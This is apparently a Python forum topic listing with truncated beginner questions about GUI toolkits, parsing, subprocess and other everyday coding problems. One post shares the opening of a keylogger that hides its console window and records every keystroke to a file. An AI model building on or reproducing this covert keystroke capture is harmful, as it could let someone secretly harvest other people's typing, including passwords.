15,190 Topics

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Member Avatar for delucasvb

Hi, This is my first post here, since I am new to Python. I've been messing around a bit with it and I think I have the basics in my fingers now. I've run into a problem with the HTMLParser: I want to use it to collect the url's contained …

Member Avatar for d5e5
Member Avatar for shyami

Hello there, I am working on pylon frame work, when i am issuing return render('/test.mako'), it is displaying index out of renge error. Plz Reply to this post if u have any idea in this. Thanks ss

Member Avatar for TrustyTony
Member Avatar for lorna2010

Hi i need someone to help me at least to give me an idea of how start thos assigment, is my first time taking a python class and is so advance for 1 month. I have to create a board game connect 4 with this instructions: The rules are as …

Member Avatar for happy123
Member Avatar for justaguy101

Hi guys! I have a problem calling the numpy.random.hypergeometric function with certain values. It seems like if the values hit in some certain range the program stalls and never finishes. I get no errors or anything and also a wxpython GUI that i have calling this function crashes with no …

Member Avatar for justaguy101
Member Avatar for sabiut

Hi, i want to write a program that will automate my backup on a windows using python but i have no idea how to get started. can someone please point me to the right direction. thanks in advance

Member Avatar for snippsat
Member Avatar for alabandit

I need to monitor a number of folders over a period of time. so i pass the files in each folder to a list of list. [CODE] import os path_to_watch = [] path_to_watch.append("/path1/") path_to_watch.append("/path2/") path_to_watch.append("/path3/") before = [],[] for item, folder in enumerate(path_to_watch): print "i am here", item, " : …

Member Avatar for TrustyTony
Member Avatar for gorbulas

Is there any problem with manipulating very long strings? When I say long, I'm meaning like over 100,000 characters long. I'm using examplelongString = data.readline() to get it from an html file. I then use examplelongString .find('text to find') to search for stuff. I've been trying to do it, it …

Member Avatar for TrustyTony
Member Avatar for ChargrO

Hello, im currently working on a program and im trying to create a cascade, This cascade code works by itself but i want to implement def hello and def toggle into def __init__(self, master=None), at the moment im getting and error "UnboundLocalError: local variable 'submenu' referenced before assignment" does anyone …

Member Avatar for TrustyTony
Member Avatar for jonb7

I am trying to show a diff in two files from a daily script. i am unable to get it to read the files correctly and show what is different. example of the files is - <ad_xml> <group name="group1"> </group> <group name="group2"> <user> <name>user1</name> </user> <user> <name>user2</name> </user> <user> <name>user3</name> …

Member Avatar for TrustyTony
Member Avatar for afireinside

I had a question...Im using TKinter in python trying to build a GUI to run some command prompt scripts others have made. I am having some trouble though...pretty early on... I can open a file and get the file name, but I can not even pass the file name to …

Member Avatar for TrustyTony
Member Avatar for Kruptein

The SetValue() and GetValue() are to complicated, but it should work with WriteText()... although this always prints a newline if I press the space button...? [code=python] def OnKeyDown(self, event): insp=self.text_ctrl_1.GetInsertionPoint() words=self.text_ctrl_1.GetValue().split(" ") #get all the words hl=[["in","red"]] #syntax list All words=in should become red prev="" #previous words processed wordcount=0 for …

Member Avatar for jonb7

Hi , I am trying to show members of groups in Active Directory and then enter them into XML format but am having problems getting it to work. I am new to all this stuff but have to get this to work fairly quick. Can someone advise please. [CODE]""" Script …

Member Avatar for jonb7
Member Avatar for pythonNerd159

Hello all, just making a quick check to see if anyone can help me fix my code. I need to show the result in an entry screen... [CODE]# Tkinter class template to test apps try: # Python2 import Tkinter as tk except ImportError: # Python3 import tkinter as tk class …

Member Avatar for vegaseat
Member Avatar for shankhs

Hi frnds, I am a newbie to python ( I am learning it for 1 month now on win platform) .I came across these cool functions of python like os.path.isdir("\\\\blah\\") but since "blah" is password protected I am always getting false as return!!!! Can anyone please tell me how to …

Member Avatar for Domi

Is there any way to access a specific Window/Frame? [CODE]#!/usr/bin/python # communicate.py import wx class LeftPanel(wx.Panel): def __init__(self, parent, id): wx.Panel.__init__(self, parent, id, style=wx.BORDER_SUNKEN) self.count = 0 button1 = wx.Button(self, -1, "new frame", (-1, -1)) self.Bind(wx.EVT_BUTTON, self.OnNewFrame, id=button1.GetId()) def OnNewFrame(self,event): StockFrame(self,-1,'window %s' %self.count) self.count = self.count + 1 class StockFrame(wx.Frame): …

Member Avatar for lam-chop

I'm trying to figure out how to make a recursive maze solver, but I'm stuck at how to tell the maze to turn around and trace back its trail once it hits a dead end. Anyone able to help me?

Member Avatar for justaguy101
Member Avatar for Alq Veers

Hi guys, Im trying to bring up a new window then the Credits button located in the help menu is clicked. Im trying to run it as a command. So right now, that code doesnt work unless you comment out the creditsCommand region. So can anyone point me in the …

Member Avatar for Alq Veers
Member Avatar for spaghettios

Hi, I have written a short program that will scrape a given website for img src that have their attribute tag with id="marked". The program works, but I am not quiet sure which attributes to make private. Here is the code. [CODE]import urllib from BeautifulSoup import * class ImgScrape(object): def …

Member Avatar for ultimatebuster
Member Avatar for jozz3

I'm just playing around with basic GUI code. I have created two check boxes, and a text field below them. I want it to say, "I like Pizza", 'I like Pasta", "I like nothing", or "I like Pizza and Pasta" in the text field depending upon which checkboxes are ticked. …

Member Avatar for woooee
Member Avatar for tyuo9980

I have made a simple keylogger but there are some problems with it. [CODE]import win32api import win32console import win32gui import pythoncom, pyHook win = win32console.GetConsoleWindow() win32gui.ShowWindow(win,0) def OnKeyboardEvent(event): if event.Ascii==28: _exit(1) if event.Ascii != 0: f=open('C:\Users\Peter\Desktop\output.txt','r') buffer=f.read() f.close() f=open('C:\Users\Peter\Desktop\output.txt','w') keylogs=chr(event.Ascii) if event.Ascii==13: keylogs='/n/' if event.Ascii==32: keylogs='/s/' if event.Ascii==8: keylogs='/b/' if …

Member Avatar for tyuo9980
Member Avatar for cahram

Is it possible to search for a string in an array that is in a larger array? I have an array that contains arrays of either one, two, three, or four strings. for instance: myList[1] = ['dog', 'cat'] myList[2] = ['lizard', 'sheep', 'pig'] I want to search for 'sheep' Is …

Member Avatar for TrustyTony
Member Avatar for Robbert

Hi - I get the following "The program is still running! Do you want to kill it?" from the python IDE when I run the following splashscreen. Any ideas on how to fix it? [CODE]#!/usr/bin/python import wx class MyFrame(wx.Frame): def __init__(self, parent, id=wx.ID_ANY, title="", pos= wx.DefaultPosition, size=wx.DefaultSize, style=wx.DEFAULT_FRAME_STYLE|wx.SUNKEN_BORDER): wx.Frame.__init__(self, parent, …

Member Avatar for Robbert
Member Avatar for nsutton

I use textwrangler for osx right now, but i want to see what other free ide's are out there. Is there one with tabs for classes and object to be separated?

Member Avatar for justaguy101
Member Avatar for richardtreier

Hi, i am currently using wx.xrc to create parts of my programs, but i got a little problem: [B]How can I add a platebutton(wx.lib.platebtn) to my xrc file?[/B]

Member Avatar for linuxoidoz

Hi, What's the easiest way to check whether an item is in a list and then get to that element and do something with it? So far I can think of [CODE] if x in List: for x in List: if x = y: do something [/CODE] Thank you.

Member Avatar for linuxoidoz
Member Avatar for awn

Hi, I'm trying to get a python script to automatically start at boot up in xubuntu. The idea is for the python - tk-inter window to pop up just after boot up and start its routine. I have tried including the path in the application auto start, modifying bash commands, …

Member Avatar for awn
Member Avatar for valorien

Hi Everyone :-) I'm writing a small Python script that invokes the Linux shell and runs some BASH commands in it. My problem is, I can't seem to use the output and store it in a Python variable. Here's what i'm trying: [CODE] import subprocess value = subprocess.call("ls -la", shell=True) …

Member Avatar for d5e5
Member Avatar for prashanth s j

Hi all, How to access the value of WER from the following: [code] valuesfor1 = [('WER', 100)] valuesfor2= [('WER', 700)] [/code] My requirement is I need to compare WER from valuesfor1 with WER from valuesfor2. ie something like [code] if [('WER', 100)] < [('WER', 700)] : print "values for 2 …

Member Avatar for TrustyTony
Member Avatar for Kruptein

Is there a way to catch the text a user types, then do some function on it and then return it to the screen? input(text) -> function(text) -> output(text) I want to colourize certain words, so I want the function to find those words and then colorize them..

Member Avatar for Kruptein
Member Avatar for bpinheiro0186

Hey folks, I am new on the forum and new to Python. I am making a news site and using python/django. My site will get all the news from the DB and fill up the template. As there is about 10 lines for the news and at some moment i …

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The End.